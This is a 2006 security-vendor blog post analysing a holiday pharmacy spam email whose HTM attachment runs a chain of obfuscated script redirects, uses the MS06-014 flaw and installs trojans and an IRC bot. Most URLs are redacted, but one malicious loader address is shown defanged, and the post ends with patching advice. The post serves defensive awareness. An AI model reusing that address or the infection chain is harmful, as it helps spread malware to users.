検索:
ホーム   »     »   Happy Holidays and a Malware Package for You

Happy Holidays and a Malware Package for You

  • 投稿日:2006年12月7日
  • 脅威カテゴリ:未分類
  • 執筆:ウイルス解析担当者
0

Holiday season is near and just as we have expected, a malware comes to exploit the occassion. Add to that the fact that pharmaceutical come-ons and ploys via spammed emails are increasing these days makes this incident worthy of a write-up.


Early this morning, we received a report that an email with an htm attachment was being spammed in the net. A screenshot of the email is seen below.



The email attachment, Holliday_Pharmacy-Blowout-Deals_HERE.htm(take note of the spelling for Holliday) entices people to view the html file.


This is a fresh approach in terms of mail-propagating malwares since it uses an html file as an attachment rather than the usual exe or zip file. But since html files can still execute code, they are still very dangerous to view, specially if they coming from an email you are not expecting.


Upon viewing the attachment, the javascript code inside it is executed which loads the site:


http://BrightBoo{blocked}0eF7ce8fc50T34b5400d5593Bf11ea


A couple of minutes earlier, the site was inaccessible; however, after a round of trials leeching the site, we finally were able to dig up some nasties.


From here on we have another case of an FTBM, or what is known as the Follow The Bouncing Malware scenario, which ultimately leads to the installation of a bot in your systems. Below is a summary of the malware track (so far…)



  • Holliday_Pharmacy-Blowout-Deals_HERE.htm

    • the malicious attachment; contains an obfuscated javascript code that loads the site “http://BrightBooksDire{blocked}fc50T34b5400d5593Bf11ea” which is detected by Trend Micro as JS_REDIR.AI.

  • http://BrightBooksDi{blocked}8fc50T34b5400d5593Bf11ea(index.ht{blocked}34b5400d5593Bf11ea)

    • This contains another obfuscated javascript code that loads http://{blocked}/404.php detected by Trend as JS_REDIR.AJ.

  • http://{blocked}/404.php

    • contains another obfuscated javascript code that loads http://{blocked}/external.php, detected as JS_WONKA.AC, through an iframe.

  • http://{blocked}/external.php

    • contains an obfuscated vbscript code which downloads and executes the file http:// {blocked}/win32_update.exe through the MS06-014 vulnerability. The file downloaded is already detected by Trend Micro as TROJ_SMALL.FAR.

  • http://{blocked}/win32_update.exe (TROJ_SMALL.FAR)

    • downloads and executes http{blocked}.com/exp/01.exe and http://{blocked}.com/exp/02.exe, both detected by Trend as TROJ_DELF.DGRand WORM_IRCBOT.RVrespectively.

  • http://{blocked}/exp/01.exe

    • This drops other malicious files in the systems.

  • http://{blocked}/exp/02.exe


    • This is a Bot malware.

  • http://{blocked}/index.html


    • This html redirects to http://{blocked}/exp/exploit.php. They will be detected by Trend as HTML_REDIR.AQand JS_PSYME.FTrespectively.

  • http://{blocked}/exp/exploit.php


    • This contains javascript code which downloads the file hxxp://olatesuite.com/exp/loader_exe.php and saves it to the local computer as “c:ie7_update.exe. The downloaded file will be detected as TROJ_DLOADER.IAT

Every malicious code and behavior that has been described above will not be seen by the user; instead, a blank 404 or Not Found page will be seen. Sneaky!



As we are still further analyzing the files, we will just update this blog once more information are gathered.


In the meantime, here are things you can do to mitigate this holiday menace.



  • Since the jump off point of the malwares is from an HTM document, try disabling javascript in your browser. You can also use Mozilla FireFox with the NoScript plugin. This will virtually destroy all chances of the malware to kick off.
  • Also, the malware author used the MS06-014 exploit to download and execute an exe file. This wouldn’t be a problem if your systems are updated with the latest patch from Microsoft. If you’re not patched yet, well I guess this is as good a time as any to start patching, don’t you think?
  • So we better watch out, and better not cry… We just have to be aware of these Holiday computer threats so that our holidays will indeed be merry, bright and peaceful! Cheers!

No related posts.



  • 個人のお客さま向けオンラインショップ
  • |
  • 法人のお客さま向け直営ストア
  • |
  • 販売パートナー検索
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • 電子公告
  • ご利用条件
  • プライバシーポリシー
  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.